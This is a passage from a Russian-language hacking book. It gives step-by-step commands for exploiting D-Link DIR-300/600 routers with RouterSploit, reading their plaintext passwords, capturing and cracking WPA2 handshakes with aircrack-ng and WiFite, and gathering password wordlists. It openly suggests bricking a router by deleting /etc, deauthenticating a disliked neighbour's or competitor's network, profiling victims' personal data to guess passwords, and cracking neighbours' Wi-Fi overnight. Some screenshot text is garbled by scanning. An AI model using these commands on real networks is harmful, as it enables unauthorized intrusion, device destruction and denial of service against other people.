Примечание. Третью команду нужно вводить, если порт роутера отличается от 80. По умолчанию используется порт 80, поэтому ее вводить не нужно. Но если ты с помощью птар вычислил, что роутер использует другой порт, то посредством команды set port номер порта нужно изменить.

Далее появится список, где будет показано, подвержен ли роутер какой-либо уязвимости:

```
[-] exploits/zte/f6xx_default_root is not vulnerable
[-] exploits/juniper/screenos_backdoor is not vulnerable
...
[*] Elapsed time: 182.20102120 seconds
[+] Device is vulnerable!
- exploits/dlink/dir_645_815_rce
- exploits/dlink/dir_300_600_rce
```

Последние строки говорят о том, что роутер подвержен уязвимостям. Против него можешь использовать сразу два эксплойта.

## 10.4.3. Проверка на конкретную уязвимость

Первым делом нужно зайти на страницу аутентификации роутера, где в 100% случаев будет название производителя, и в 90% – название модели. Когда мы знаем вендора и модель роутера (пусть это будет D-Link DIR-300), нам нужно найти что-то созвучное среди эксплойтов. Давайте проверим, уязвим ли тестируемый роутер именно к этому эксплойту.

#### Выбираем его для использования:

use exploits/dlink/dir\_300\_600\_rce

#### Смотрим информацию о нем:

```
show info
Name:
D-LINK DIR-300 & DIR-600 RCE
Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution
vulnerability which allows executing command on operating system
level with root privileges.
Devices:
- D-Link DIR 300
- D-Link DIR 600
Authors:
- Michael Messner <devnull[at]s3curlty.de> # vulnerability
discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit
module
References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-
600-wireless-n-150-home-router
- http://www.s3curlty.de/home-network-horror-days
http://www.s3cur1ty.de/mladv2013-003
```

Все совпадает – наше устройство есть в списке уязвимых. Установи цель (и порт, если это нужно, – не забывай о порте!):

set target 111.22.33.44

Если ты не хочешь убивать роутер, а только проверить, сможешь ли ты его взломать выбранным экплойтом, введи команду:

```
check
```



Вывод будет такой:



### 10.4.4. Использование эксплойтов

После того как ты нашел уязвимость, которой подвержен роутер, выбери соответствующий модуль:

use exploits/dlink/dir\_300\_600\_rce

Установи цель:

set target 111.22.33.44

Запусти эксплойт:

run rsf(D-Link DIR-300 & DIR-600 RCE) > run [\*] Running module [+] Target is vulnerable [\*] Invoking command loop cmd >

Обрати внимание на изменившееся приглашение командной строки. Оно означает, что ты можешь передать команду непосредственно на роутер. Команды роутера – это команды той же Linux, ведь все роутеры работают под управлением этой ОС, только немного урезанной версии. Так что можешь ввести команды:



Эти команды отобразят содержимое файловой системы роутера. Далее ты должен найти пароли. Во многих моделях пароли доступа хранятся в неза-

шифрованном виде. Например, на тех же DIR-300 и DIR-600 пароли хранятся в файлах /var/passwd и /var/etc/hnapasswd. Просмотрим эти файлы:

```
cat /var/passwd
"admin" "1234567890!' "0"
cat /var/etc/hnapasswd
admin:1234567890!
```

Теперь можешь зайти на страничку роутера http://<IP-адрес>. Некоторые роутеры настолько глупы, что разрешают доступ к этой страничке извне. Болышинство современных роутеров не позволяют этого сделать. Что можно сделать в этом случае? Можно, например, сменить пароли и перезагрузить роутер:

```
echo "hacker:9999999" > /var/etc/hnapasswd
reboot
```

Можно удалить файлы конфигурации (каталог /etc) и также перезапустить роутер - с уверенностью можно сказать, что больше он не запустится. В общем, вариантов много – на что хватит твоих знаний и твоей фантазии. В качестве дополнительного материала для размышлений делимся замечательной ссылкой, где описано сравнение Router Sploit и Router Scan, также есть некоторая информация о взломе роутеров DLink DIR: https://hackware. ru/?p=1766.

## 10.5. Взлом WPA2-роутера. Мифы и реальность

В этом разделе один из авторов этой книги попытается взломать свой домашний роутер. Схема будет такой. В виртуальную машину VMWare будет установлена Kali Linux. К виртуальной машине будет подключен USB-адаптер (благо, проброс USB-портов в VMWare работает корректно, в отличие от того же Hyper-V), через который и будут производиться попытки подключения к домашней Wi-Fi-сети.

Но сначала небольшой экскурс. Когда Wi-Fi-сети только появились, использовалась технология Wired Equivalent Privacy (WEP), которая должна была обеспечить конфиденциальность Wi-Fi-сетей. Но эта технология оказалась неэффективной, ее легко взломать. На смену WEP был разработан новый

Ë.

алгоритм обеспечения конфиденциальности – WPA (Wi-Fi Protected Access). WPA – это не какая-то новая технология, это целый набор технологий – 802.1X + EAP + TKIP + MIC (если не знаешь, что это, – загугли). Все это усложнило взлом, но не сделало его невозможным.

Начиная с 2006 года, стал распространяться протокол WPA2. В качестве алгоритма шифрования он использовал AES, взломать который очень сложно. Недостаток WPA2 заключается в том, что зашифрованный пароль передается при подключении пользователей во время так называемого 4-way handshake (4-стороннего рукопожатия). Если мы поймаем handshake, то узнаем зашифрованный пароль, и нам останется лишь расшифровать его. Для этой цели мы воспользуемся aircrack-ng.

Но от слов – к делу. Давай посмотрим, как взлом выглядит на практике. Первым делом нужно определить, как называется наш беспроводной интерфейс в Linux. Для этого введи команду:

#### ifconfig

Эту и все последующие команды нужно вводить от имени root. Так что войди как root, если ты этого еще не сделал, или же введи команду sudo bash, чтобы получить командную оболочку с правами root.

В результате выполнения **ifconfig** ты увидишь список сетевых интерфейсов в твоей системе (рис. 10.5). Как правило, беспроводные адаптеры в Kali Linux называются wlanN, где N – номер адаптера, нумерация начинается с 0. Если у тебя один адаптер, то его имя будет wlan0. Наша догадка подтвердилась, и интерфейс действительно называется wlan0.

Теперь нам нужно перевести адаптер в режим мониторинга. В этом режиме Wi-Fi-адаптер будет видеть весь трафик, проходящий мимо нас.

Примечание. Когда-то, в 2004-2006 годах была очень популярная программа GiveMeToo. Ее использовали не только хакеры, но и служба безопасности крупных предприятий. Суть заключалась в следующем. Все сети того времени были построены на базе технологии Ethernet (о Wi-Fi мало кто тогда знал, а если и знал, то на наших просторах она мало использовалась). В качестве основных сетевых устройств использовались хабы (HUB) или же вообще использовалась технология общей шины, когда все компьютеры подключались подобно гирлянде. Правда, на крупных предприятиях такая технология не использовалась, использовались в основном хабы, так как повреждение общей шины гарантировало простой всей сети. Хаб, он же концентратор, использовал, по сути, ту же технологию общей шины. Когда один из компьютеров отправлял пакет данных, хаб получал его и передавал на все свои порты. То есть отправленный тобой пакет данных получали все компьютеры сети.

Далее компьютер анализировал пакет. Если в качестве получателя был указан этот компьютер, он его принимал, если же другой – пакет выбрасывался (DROP). Программа GiveMeToo переводила сетевой адаптер в так называемый неразборчивый режим (promisc mode), в котором он принимал все пакеты – и те, которые были адресованы ему, и те, которые были адресованы другим компьютерам. А дальше начиналось самое интересное. Учитывая, что трафик был не зашифрован в то время (не использовалось какое-либо шифрование, протокол HTTP был именно HTTP, а не HTTPS и т.д.), то хакер мог легко прочитать всю переписку (почта, ICQ, IRC), просмотреть, кто и какие сайты посещает и т.д. И тогда быть хакером было очень просто. Не нужно было никаких особых знаний – просто запусти на любом (!) компьютере, подключенном к сети, программу GiveMeToo и наблюдай за всеми. Последнее обновление этой замечательной программы было в 2006

году.

Дальше сети просто перешли на использование коммутаторов (switch). Коммутатор пересылает отправляемый пакет не на все порты, а только на конкретный порт. Когда к порту коммутатора подключается компьютер, он вносит его адрес во внутреннюю таблицу. Когда он видит поступаемый пакет, он анализирует адрес получателя и отправляет пакет только на тот порт, к которому подключен получатель. Вторая причина, по которой использование GiveMeToo не представляется возможным, – повсеместное использование шифрования. Все передаваемые по сети данные зашифрованы и даже если ты их перехватишь, то для их расшифровки нужно постараться. Что же касается Wi-Fi, то здесь все передаваемые данные (от всех сетей!) передаются по общей среде – по воздуху. Именно поэтому мы можем переключить адаптер в режим мониторинга, что позволит захватывать весь передаваемый вокруг тебя трафик.







Рис. 10.6. Невозможно перевести адаптер в режим мониторинга

Для этого вводим команду:

286

```
airmon-ng start wlan0
```

Конкретно в моем случае программа сообщила, что не может перевести адаптер в режим мониторинга, поскольку он используется двумя процессами – NetworkManager и wpa\_supplicant. Чтобы "убить" эти процессы, нужно ввести команду *airmon-ng check kill*.

Вводим эту команду и смотрим, что получится:

airmon-ng check kill

Программа сообщит, что "убила" определенные процессы:

Killing these processes:	and the second
PID Name	
95191 wpa_supplicant	

Куда подевался NetworkManager непонятно, но мы попытаемся снова перевести интерфейс в режим мониторинга:



Рис. 10.7. Убиваем блокирующие интерфейс процессы

Как ты увидишь, программа airmon-ng сообщит, что интерфейс wlan0.... не найден. В результате проведенных действий наш интерфейс был переименован в wlan0mon, о чем сообщит вывод команды *ifconfig* (10.8).


Рис. 10.8. Интерфейс wlan0 был переименован в wlan0



Рис. 10.9. Адаптер переведен в режим мониторинга

Поэтому вводим команду:

airmon-ng start wlan0mon

Как видно на рис. 10.9, адаптер успешно переведен в режим мониторинга.

Теперь, когда наш сетевой адаптер находится в режиме мониторинга, мы можем захватить проходящий мимо нас трафик, используя команду *airodump-ng*. Вводим команду:

airodump-ng wlan0mon

Далее вывод будет таким, как показано на рис. 10.10. Разберемся, что и к чему. В верхней части выводится список беспроводных сетей. В нижней части – список клиентов. Обрати внимание, сейчас есть два клиента – один подключен к интересующей нас сети с BSSID D8:0D:17:A5:F9:F4. ESSID для этой сети мы затерли специально, чтобы по нему нельзя было вычислить автора этой книги – анонимность превыше всего. Второй клиент подключен к сети B0:4E:26:A4:89:82 – сеть называется TP-Link\_8982.

Наш следующий шаг — сосредоточить наши усилия на одной из точек доступа и на ее канале. Нас интересует BSSID и номер канала точки доступа (выводится в колонке CH), которую мы будем взламывать. Открой новый терминал и введи команду:

airodump-ng --bssid D8:0D:17:A5:F9:F4 -c 2 -w WPAcrack wlan0mon

Рис. 10.10. Режим мониторинга запущен

Здесь:

- *D8:0D:17:A5:F9:F4* BSSID точки доступа;
- -*с* 2 канал, на котором работает точка доступа Wi-Fi;
- WPAcrack файл, в который запишется handshake;
- wlan0mon сетевой адаптер в режиме мониторинга.

Как вы можешь видеть на скриншоте 10.11, мы сейчас концентрируемся на захвате данных с одной точки доступа с BSSID D8:0D:17:A5:F9:F4 на канале 2. Терминал оставляем открытым!



Рис. 10.11. Захватываем данные только с определенной Wi-Fi-сети

Чтобы захватить зашифрованный пароль, нам нужно, чтобы клиент прошел аутентификацию (подключился к Wi-Fi). Если он уже аутентифицирован, мы можем его деаутентифицировать (отключить), тогда система автоматически повторно аутентифицируется (подключится), в результате чего мы можем получить зашифрованный пароль.

То есть нам просто нужно отключить подключенных пользователей, чтобы они подключились снова.

Для этого открываем еще один терминал и вводим:

\$ aireplay-ng --deauth 100 -a D8:0D:17:A5:F9:F4 wlan0mon

Здесь:

- 100 количество, пользователей, которые будут деаутентифицированы;
- *D8:0D:17:A5:F9:F4* BSSID точки доступа;
- wlan0mon сетевой адаптер в режиме мониторинга.

Если ты, как и мы, взламываешь свою собственную сеть для эксперимента, можешь отключить только одного клиента (например, свой мобильный телефон) и подключить его заново, не убивая при этом всех остальных клиентов.

Теперь при повторном подключении окно, которое мы оставили на предыдущем шаге, поймает handshake.

Давайте вернемся к нашему терминалу airodump-ng и посмотрим. В верхнем правом углу вы должны увидеть фразу:

CH 2][Elapsed: 5 mins] [ 2020-12-14 10:45 ] [ fixed channel wlan0mon: 2 ] [ WPA2 handshake: D8:0D:17:A5:F9:F4

Это означает, что мы захватили зашифрованный пароль. Это уже что-то.

Пароль у нас есть, осталось его расшифровать.

Теперь, когда у нас есть зашифрованный пароль в нашем файле WPAcrack, мы можем запустить подбор пароля. Но для этого нам нужно иметь список с паролями, которые мы хотим использовать. Найти такой список можно за 5 минут в Гугле. Мы используем списки паролей по умолчанию, которые есть в Kali Linux. Все эти списки слов хранятся в каталоге /usr/share/wordlists (рис. 10.12).

\$ aircrack-ng WPAcrack-01.cap -w <полный путь к списку слов>

Открой новый терминал и введи команду:

291



Рис. 10.12. Список паролей

Здесь WPAcrack-01.cap файл, в который мы записывали handshake (airodumpng приписал в конце -01.cap).

Сколько времени займет взлом зашифрованного пароля? Пароли взламываются по типу брутфорса – то есть программа просто пытается использовать пароль из списка слов. Если им получится дешифровать файл WPAcrack, значит, взлом прошел успешно. В противном случае – пробует следующий пароль. Поэтому успех зависит от твоего словаря. Понятно, что если не получится с одним списком, можешь пробовать следующий. Рано или поздно найдется слово, которое пользователь указал в качестве пароля.

Этот процесс может занять много времени. Все зависит от длины списка паролей, ты можешь ждать от нескольких минут до нескольких дней. На 2-ядерном процессоре Intel aircrack-ng подбирает чуть более 700 паролей в секунду. В виртуальной машине этот показатель может быть меньше. Когда пароль будет найден, он появится на твоем экране.

Рекомендации по использованию программы:

1. Данный вид атаки эффективен для подбора пароля по списку, но практически бесполезен для рандомного подбора. Все дело во времени. Если

Wi-Fi защищен средним паролем из латинских букв и цифр, то рандомный подбор займет несколько лет.

- 2. При выборе списка паролей обязательно учитывай географические факторы. Например, нет смысла делать подбор в ресторане Берлина по русскому списку паролей. Найди список часто используемых паролей на немецком и запасись терпением. В любом случае, ты можешь захватить зашифрованный пароль, а продолжить расшифровку в другом месте (дома, в отеле). Когда пароль будет расшифрован, ты сможешь вернуться к той точке доступа и подключиться к ней.
- 3. Если тебе насолил сосед или конкурент, используй команду aireplay-ng --deauth 100 -a <BSSID> wlan0mon, чтобы "положить" его сеть.
- 4. Если ты взламываешь домашний Wi-Fi, то постарайся узнать какие-либо персональные данные жертвы (имя, фамилию, дату рождения, кличку собаки, имя ребенка и.т.д.) и сгенерировать дополнительный список паролей из этих данных. Часто используются такие пароли (этими паролями нужно обязательно дополнить твои списки паролей, причем добавить их в самое начало списка, так как успех с этими паролями очень вероятен):
  - » Имя ребенка и дата рождения, например Dima210611;
  - » Номер телефона (настройщики Wi-Fi по вызову не заморачиваются и устанавливают в качестве пароля номер телефона клиента);
  - » Последовательности цифр 123456789, 1234567890, 12345678900, 987654321 и т.д.
- 5. После того как поймал handshake, отключай работу *aireplay-ng* (не заставляй страдать простых пользователей). Конечно, если у тебя не пункт 3.

### 10.6. Автоматизируем взлом с помощью WiFite

Читатели, хорошо знакомые с техническими предметами, сейчас наверняка вспомнят, как проходило обучение. Сначала тебе объясняют 10 разных методов решения. А потом говорят, что вот есть одиннадцатый метод, который самый простой и который поможет в большинстве случаев, кроме каких-то крайних значений. Аналогичная ситуация сложилась и со взломом Wi-Fi. В прошлом разделе было показано, как использовать целый комплекс программ для взлома Wi-Fi-сети. В этом разделе мы рассмотрим инструмент WiFite, позволяющий весь этот процесс автоматизировать. Он использует те же инструменты, что мы использовали в прошлом разделе, и некоторые дополнительные. Итак, обо всем по порядку.

WiFite – это инструмент для автоматизированной беспроводной атаки, и работает он только в Linux, то есть никаких Windows-версий или версий для macOS нет.

WiFite используется с дистрибутивами для тестирования на проникновение, такими как Kali Linux, Pentoo, BackBox; любыми дистрибутивами Linux с пропатченными для инжекта беспроводными драйверами. По-видимому, также работает на Ubuntu, Debian и Fedora.

Программу нужно запускать только с полномочиями гооt, что необходимо для программ, которые использует WiFite при взломе Wi-Fi. Запускать чтолибо от *root* мы бы не рекомендовали, поэтому лучше всего установить Kali Linux в виртуальную машину, подключить USB-адаптер Wi-Fi (да, придется потратиться ради безопасности). Не нужно запускать этот инструмент на системе, которую ты используешь для ежедневной работы. Если же ты на каждый день используешь Windows, то выбора особо нет – устанавливай Kali Linux, и в нем уже будет WiFite.

WiFite предполагает, что у тебя есть беспроводной адаптер и подходящие драйверы, пропатченные для инжекта и неразборчивого режима / режима наблюдения. Такие есть в Kali Linux, BackBox, Pentoo. В других дистрибутивах обо всем этом нужно позаботиться самостоятельно.

Инструмент может атаковать множество зашифрованных сетей WEP, WPA и WPS подряд. Этот инструмент настраивается до автоматизма всего лишь несколькими аргументами. Цель WiFite — быть инструментом беспроводного аудита по принципу "установил и забыл". Другими словами, ты запускаешь его, видишь список беспроводных сетей, выбираешь цели и ждешь, пока инструмент взломает выбранную тобой сеть. Можешь даже атаковать даже все точки доступа вокруг.

Особенности инструмента:

- Сортирует цели по сигналу (в dB); первыми взламывает самые близкие точки доступа.
- Автоматически деаутентифицирует клиентов скрытых сетей для раскрытия их SSID.

- Набор фильтров для точного указания, что именно атаковать (wep/wpa. выше определенной силы сигнала, каналы и т.д.).
- Гибкие настройки (таймауты, пакеты в секунду, другое).
- Функции "анонимности": смена МАС на случайный адрес перед атакой, затем обратная смена, когда атака завершена.
- Все захваченные рукопожатия WPA копируются в текущую директорию wifite.py.
- Умная деаутентификация WPA; циклы между деаутентификацией всех клиентов в широковещательной сети.
- Остановка любого взлома по Ctrl+C с опциями для продолжения, переход к следующей цели, пропуск взлома или выход.
- Отображение общей информации по сессии при выходе; показ всех взломанных ключей.
- Все пароли сохраняются в cracked.txt.

Обязательные зависимости:

- *Python WiFite —* это скрипт, написанный на Python, и для запуска требуется Python, программа совместима с версиями python2 и python3.
- *iwconfig* для определения, находятся ли беспроводные интерфейсы уже в режиме монитора.
- ifconfig- для запуска/остановки беспроводных устройств
- Набор aircrack-ng используются конкретно следующие программы:
  - » *airmon-ng* для перечисления и включения режима мониторинга на беспроводных интерфейсах;
  - » aircrack-ng для взлома WEP .cap файлов и захваченных WPA рукопожатий;
  - » aireplay-ng для деаутентификации точек доступа, повторного воспроизведения файлов захвата, различных атак4

-----

- » airodump-ng для сканирования целей и генерации файлов захвата;
- » packetforge-ng для подделки файлов захвата.

Необязательные, но рекомендуемые зависимости:

- Reaver предназначен для подборки пина WPS (Wi-Fi Protected Setup) методом перебора. Reaver включает сканер "walsh" (или "wash") для выявления точек доступа с включенным WPS. Wifite использует Reaver для сканирования и для атаки на роутеры с включенным WPS.
- Pyrit взломщик ключей WPA PSK, используя графический процессор. Wifite использует Pyrit (если нашла) для выявления хендшейков. В будущем Wifite может получить опцию взламывать хендшейки WPA с помощью Pyrit.
- tshark поставляется в связке с Wireshark, программным обеспечением для сниффинга пакетов.
- coWPAtty взломщик ключей WPA PSK. Wifite использует cowpatty (если есть) для выявления рукопожатий.
- **Pixiewps** это инструмент, написанный на C, он используется для офлайн брутфорса пина WPS посредством эксплуатирования низкой или несуществующий энтропии некоторых точек доступа (атака pixie dust).

Запуск:

wifite wifite -pow 40 -wps

При запуске без параметров программа ищет все доступные точки доступа. Во втором случае программа будет атаковать точки доступа с мощностью более 40 dB (-pow 40), используя атаку WPS (-wps). Как правило, если уровень сигнала ниже 40 dB, то точка доступа находится дальше, чем хотелось бы, и даже если ты ее взломаешь, что хорошего интернет-соединения через нее не получишь.

Посмотрим на программу в действии. Запусти ее без параметров. Если не хватает каких-то утилит, программа в самом начале сообщит об этом. Формат сообщения об отсутствующей программе следующий:

[!] Warning: Recommended app <название> was not found. install <команда>

Приводится название программы и команда, которую необходимо ввести для ее установки. Настоятельно рекомендуется установить все отсутствующие программы.

😫 💷 🗔 🖳 🗐 👘 🖬 🙃 root@kali: -		11.22 ЛП (АМ) 🗆 🐠 🌲 💿 🖨 🕞
	root@kali.~	_ U X
Файл Действия Правка Вид Справка		
-diant∎fatti (*) -diantfite		
<pre>mility12.515     a wireless auditor by gderv82     //      maintained by kinocoder     //      //      //      //      //      //      //      //      //      //      //      //      //      //</pre>		
1 Shereing: Recommendation app is the weap net found. Lessel: here negative meaning meaning app is the weap need to be found in many range decommendation app is the second to be applied on the many range of the second to be applied on the second to be applied of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the second to be applied on the found of the second to be applied on the found to be applied on the second to be appli		
Interface PHY Driver Chipset		
1. stand phyd rildddath Edimax Technology		
[+] enabling manitor more on stand enabled standmon		
NUM ESSID CH ENCR POWER WPS?		
AL         10         project         project<		
[+] Scanning, Found + target(s), 1 client(s), Crl+C when NUM ESSID CH ENCR POWER WPS?		
All         Tre         statup         Tre         statup	rang CLION CLION CLION	

Рис. 10.13. Программа ищет Wi-Fi-сети. SSID взламываемой сети мы, как всегда, закрыли

На **Conflicting processes** не обращай внимания, если нет проблем – если ты видишь список точек доступа и программа работает нормально. Если точек доступа нет в списке, а ты знаешь, что они есть, тогда запусти программу с параметром *--kill* (*wifite --kill*).

Далее программа начнет выводить список найденных точек доступа. Когда ты увидишь, что твоя жертва есть в списке, нажми Ctrl + C.

Когда ты нажмешь Ctrl + C, программа попросит у тебя номер взламываемой точки доступа. Если нужно взломать несколько точек доступа, введи их через запятую (1, 4 например). Если нужно взломать все точки доступа, которые увидела программа, введи **all** и нажми **Enter**.

Посмотрим вывод программы (наши комментарии помечены решеткой):

```
# Начало атаки против выбранной точки доступа
Starting attacks against D8:0D:17:A5:F9:F4 (SSID)
# Атака WPS Pixie-Dust не удалась - тайм-аут
```

[+] SSID (66db) WPS Pixie-Dust: [--3s] Failed: Timeout after 300 seconds # Атака WPS NULL PIN не удалась - тайм-аут [+] SSID (67db) WPS NULL PIN: [--3s] Failed: Timeout after 300 seconds # Атака WPS PIN Attack также не удалась - слишком много таймаутов [+] SSID (66db) WPS PIN Attack: [17m30s PINs:1] Failed: Too many timeouts (100) # Атаки РМКІД пропускаем, поскольку отсутствуют необходимые УТИЛИТЫ [!] Skipping PMKID attacks, missing required tools: hcxdumptool, hcxpcaptool # Атака WPA Handshake capture - захват пароля - обнаружен новый клиент [+] SSID (72db) WPA Handshake capture: Discovered new client: <MAC-agpec> # Пароль захвачен. Ура! [+] SSID (71db) WPA Handshake capture: Captured handshake # Сохраняем копию handshake в файле hs/handshake SSID BSSID.cap в каталоге /root [+] saving copy of handshake to hs/handshake SSID BSSID.cap saved # Анализ защифрованного пароля [+] analysis of captured handshake file: # tshark сообщает, что файл содержит корректный handshake [+] tshark: .cap file contains a valid handshake for D8:0D:17:A5:F9:F4 # a BOT aircrack (He aircrack-ng) coofmaer, wto he Bce xopomo, проверим позже [!] aircrack: .cap file does not contain a valid handshake # Пытаемся взломать пароль с помощью файла wordlist-probable.txt в нем список паролей по умолчанию. [+] Cracking WPA Handshake: Running aircrack-ng with wordlistprobable.txt wordlist [+] Cracking WPA Handshake: 100% ETA: 0s@ 1686.7 kbps (current key: 11225556) # Файл wordlist-probable.txt не содержит пароль [!] Failed to crack handshake: wordlist-probable.txt did not contain password # Завершение атаки, выход [+] Finished attacking 1 target(s), exiting # Примечание: оставляем интерфейс в режиме мониторинга [!] Note: Leaving interface in Monitor Mode! # Как закончите, выключить режим мониторинга можно командой airmon-ng stop <iface> [!] To disable Monitor mode when finished: airmon-ng stop wlan0mon

Проанализируем, что у нас вышло:

- 1. Программа пыталась атаковать роутер, используя известные ей уязвимости. Ничего не вышло.
- 2. Затем программа захватила пароль и сохранила файл с паролем в каталог hs домашнего каталога. Поскольку мы запускали программу от root, то файл с паролем был сохранен в каталог /root/hs. По имени файла ты поймешь, от какой сети захвачен пароль. А если ты взламывал одну сеть, то и думать не нужно – там будет один файл.
- 3. Программа пыталась взломать пароль, используя список паролей wordlistprobable.txt. У нее ничего не вышло, поскольку пароля в списке не обнаружено.
- 4. Далее программа осуществила выход, оставив сетевой адаптер в режиме мониторинга.

Несмотря на то, что программа не смогла взломать пароль, ей удалось получить WPA-рукопожатие, то есть зашифрованный пароль. Дело осталось за малым – запустить программу aircrack-ng для расшифровки этого пароля:

cd ~/hs aircrack-ng handshake\_SSID\_BSSID.cap -w password.txt

Итак, мы переходим в каталог ~/hs и передаем полученный файл утилите aircrack-ng. В этот же каталог мы поместили файл password.txt с вероятными паролями. Поскольку мы знали наш пароль, то в этот файл ради эксперимента добавили несколько ошибочных и один правильный пароль. Программа успешно расшифровала WPA-рукопожатие и вывела на экран пароль (рис. 10.14).



Рис. 10.14. Расшифрованный пароль

Выводы можно сделать следующие:

- Инструмент WiFite существенно упрощает процесс взлома Wi-Fi-сети. Справиться может даже начинающий пользователь Linux, поскольку всетаки с основами этой операционки нужно будет ознакомиться, а для других систем WiFite не работает.
- Успех во многом зависит от используемого списка паролей. Если ты изучил жертву и подобрал ее пароль, тебя ждет успех. Со стандартным списком паролей много не взломаешь.

## 10.7. Android-приложение для брутфорсинга Wi-Fi-сети

Существуют Android-приложения для брутфорсинга Wi-Fi-сетей – они будут просто подключаться к сети, перебирая пароли.

Одно из таких приложений – Wifi BRuteforce hack, его без проблем можно скачать в Интернете.

Понятное дело, в Play Market ты его не найдешь. Нам не нравятся такие программы. И вот почему:

- Когда ты заполучил WPA-рукопожатие, ты можешь брутфорсить его, а не роутер. Во-первых, меньше шансов быть замеченным (особенно если у соседа умный роутер). Во-вторых, гораздо быстрее. Ведь программа aircrack-ng выполняет, по сути, тоже брутфорсинг, но она это будет делать со скоростью 700 паролей в секунду на двухядерном процессоре. Попробуй достичь такой скорости при подключении к Wi-Fi!
- Успех опять-таки зависит только от файла со списком пароля.
- Если тщательно проанализировать жертву, можно составить 5-10 вариантов паролей и попытаться подобрать их вручную. Поверь, так даже будет быстрее, чем использовать подобные инструменты.
- WiFite хорош тем, что при правильной настройке (когда установлены все необходимые утилиты, когда составлены нужные списки паролей), ты можешь запустить его и лечь спать. А утром ты найдешь 1-2 пароля от соседских сетей, что уже очень неплохо!

## 10.8. Как раздобыть хороший хакерский словарь

Атака по словарю значительно ускоряет и в целом повышает шансы успешности взлома пароля методом перебора. Не может быть одного самого лучшего словаря – под разные ситуации требуются разные словари.

Оказывается, раздобыть хороший словарь – нисколько не сложнее, чем купить оружие в Интернете. Шутка:)

Ранее было сказано, что словари можно взять в Интернете и ты, наверное, уже успел подумать, что тебя оставили на произвол судьбы.

### 10.8.1. Словари BruteX

Программа **BruteX** поставляется с подборкой словарей для брутфорса удалённого входа в различные службы и веб-приложения.

Посмотреть доступные словари можно здесь: https://github.com/1N3/BruteX/ tree/master/wordlists

Там имеются словари (это не все списки, а только избранные):

- ftp-default-userpass.txt пароли FTP по умолчанию.
- mssql-default-userpass.txt пароли пользователей MS SQL по умолчанию.
- mysql-default-userpass.txt пароли пользователей MySQL по умолчанию.
- namelist.txt список имен (логинов).
- oracle-default-userpass.txt список паролей пользователей Oracle по умолчанию.
- password.lst просто список паролей.
- password\_medium.txt список паролей средней сложности.
- password\_weak.txt список слабых паролей, попробуй его в первую очередь!
- postgres-default-userpass.txt список паролей пользователей PostgreSQL по умолчанию.
- simple-users.txt имена пользователей (простые).

• windows-users.txt - список Windows-пользователей.

Всего в наборе программы 32 файла, которые ты можешь использовать в той или иной ситуации. Для начала хватит, но еще раз обращаем внимание – нужно формировать свои собственные списки. Пусть на базе уже существующих!

#### 10.8.2. Словарь госкуои

Словарь от создателей **госкуои** является универсальным словарем, хорошо подходящим, например, для атаки на пароль Wi-Fi или веб-службы.

В Kali Linux данный пароль размещен в (сжатом) файле /usr/share/wordlists/ rockyou.txt.gz (перед использованием его нужно распаковать).

На любую другую систему его можно установить командой:

#### git clone git://git.kali.org/packages/wordlists.git

Словарь госкуои нужно оптимизировать и очищать для использования под конкретные нужды. Например, если мы знаем, что длина пароля в вебслужбе составляет от 8 до 30 символов и что обязательно должны использоваться символы как минимум из двух групп (большие буквы, маленькие буквы, цифры, знаки), то очистка госкуои с помощью PW-Inspector будет выглядеть так:

pw-inspector -i wordlists/rockyou.txt -m 8 -M 30 -c 2 -l -u -n -p

Оптимизация для взлома Wi-Fi будет выглядеть следующим образом. Считываем в стандартный вывод пароли из файла rockyou.txt (cat rockyou.txt), сортируем их (sort) и удаляем повторяющиеся (uniq), из оставшихся паролей выбираем те, которые содержат 8 или более символов, но менее 63 символов (-m 8 -M 63), полученный список сохраняем в файл newrockyou.txt (> newrockyou.txt):

cat rockyou.txt | sort | unig | pw-inspector -m 8 -M 63 > newrockyou.txt

Словарь rockyou на фоне словаря BruteX выглядит действительно впечатляюще!

### 10.8.3. Словари DIRB

**DIRB** (https://kali.tools/?p=108) — это сканер веб-контента. Он ищет существующие (возможно, скрытые) веб-объекты. В основе его работы лежит поиск по словарю, он формирует запросы к веб-серверу и анализирует ответ.

Другими словами, словари DIRB предназначены, в первую очередь, для поиска разнообразных файлов и папок веб-сайтов и веб-приложений, вебсерверов.

Словари DIRB доступны всем пользователям Kali Linux и находятся в каталоге /usr/share/wordlists/dirb.

### 10.8.4. Словари DirBuster

DirBuster (https://kali.tools/?p=116) — это многопотоковое Java-приложение, предназначенное для брутфорса имен директорий и файлов вебприложений и веб-серверов. DirBuster пытается найти скрытые каталоги и файлы.

 В Kali Linux словари располагаются в директории /usr/share/wordlists/ dirbuster/. В BlackArch словари располагаются в директории /usr/share/ dirbuster/.

Описание словарей, поставляемых с программой DirBuster:

- directory-list-2.3-small.txt (87650 слов) директории/файлы которые были найдены как минимум на трех разных хостах.
- directory-list-2.3-medium.txt (220546 слов) директории/файлы, которые были найдены как минимум на двух разных хостах.
- directory-list-2.3-big.txt (1273819 слов) все директории/файлы, которые были найдены.

- directory-list-lowercase-2.3-small.txt (81629 слов) версия не чувствительная к регистру, для directory-list-2.3-small.txt4.
- directory-list-lowercase-2.3-medium.txt (207629 слов) версия не чувствительная к регистру, для directory-list-2.3-medium.txt.
- directory-list-lowercase-2.3-big.txt (1185240 слов) версия не чувствительная к регистру, для directory-list-2.3-big.txt.
- directory-list-1.0.txt (141694 слов) оригинальный список без изменения порядка.
- apache-user-enum-1.0.txt (8916 имен пользователей) используется для предположения имен пользователей apache, на котором включен модуль userdir, основывается на набранных именах пользователей (неупорядоченный).
- apache-user-enum-2.0.txt (10341 имен пользователей) используется для предположения имен пользователей apache, на котором включен модуль userdir, основывается на ~XXXXX, найденном во время генерации списка (упорядоченный).

### 10.8.5. Списки слов от Metasploit

